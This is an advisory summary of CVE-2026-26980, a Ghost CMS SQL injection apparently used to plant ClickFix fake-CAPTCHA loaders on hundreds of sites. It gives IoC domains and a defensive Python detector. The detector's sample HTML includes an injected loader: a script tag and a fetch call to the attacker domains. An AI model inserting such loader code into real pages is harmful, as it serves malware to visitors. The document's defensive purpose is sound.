Summary
Key Points:
- Exploitation of CVE-2026-26980, a critical SQL injection vulnerability in Ghost CMS, has led to the hijacking of over 700 websites for ClickFix attacks.
- Attackers can access admin API keys, allowing them to inject malicious JavaScript into compromised sites, which facilitates fake CAPTCHA attacks and further malware distribution.
- Immediate actions include upgrading Ghost CMS to version 6.19.1, rotating credentials, auditing access logs, and notifying affected users.
Technical Details: CVE-2026-26980 (CVSS score: 9.4) allows unauthenticated attackers to read arbitrary data from the database and gain unauthorized access to admin functionalities. The injected JavaScript serves as a two-stage loader that retrieves payloads from an external domain.
MITRE ATT&CK Techniques:
- T1190 - Exploit Public-Facing Application (Initial Access)
- T1071.001 - Application Layer Protocol: Web Protocols (Command and Control)
- T1059.001 - Command and Scripting Interpreter: PowerShell (Execution)
- T1203 - User Execution (Execution)
IOCs Mentioned:
- clo4shara[.]xyz
- web-telegram[.]ug
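Defender-side checks for the remediation steps and IoCs listed above, as an added example that is not part of the original advisory: it flags a Ghost version older than the fixed 6.19.1 release and scans page HTML (a crawled page or the Admin code-injection snippets) for script references to the two published domains. The sample HTML is constructed for the demonstration.

```python
import re
from html.parser import HTMLParser

# IoC domains as published (defanged); refanged here for matching.
IOC_DOMAINS = [d.replace("[.]", ".") for d in ("clo4shara[.]xyz", "web-telegram[.]ug")]
FIXED_VERSION = (6, 19, 1)  # first Ghost release without CVE-2026-26980

def parse_version(text):
    """'v6.18.0-beta' -> (6, 18, 0)."""
    m = re.match(r"v?(\d+)\.(\d+)\.(\d+)", text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(x) for x in m.groups())

def is_vulnerable_version(text):
    return parse_version(text) < FIXED_VERSION

class _ScriptCollector(HTMLParser):
    """Collects external <script src> URLs and inline <script> bodies."""
    def __init__(self):
        super().__init__()
        self.srcs, self.inline, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script and data.strip():
            self.inline.append(data)

def find_ioc_references(html):
    """Return sorted (domain, location) pairs for IoC domains referenced by scripts."""
    p = _ScriptCollector()
    p.feed(html)
    hits = set()
    for d in IOC_DOMAINS:
        hits.update((d, "script src") for s in p.srcs if d in s.lower())
        hits.update((d, "inline script") for b in p.inline if d in b.lower())
    return sorted(hits)

# Constructed sample page: one legitimate tag plus an injected two-stage loader.
SAMPLE_HTML = """<head><script src="https://cdn.example.com/analytics.js"></script>
<script src="https://clo4shara.xyz/loader.js"></script>
<script>fetch("https://web-telegram.ug/stage2").then(r => r.text());</script></head>"""
```

Run `find_ioc_references` over each site's rendered HTML and the Ghost Admin code-injection fields; any hit is grounds for the credential rotation and log audit listed above.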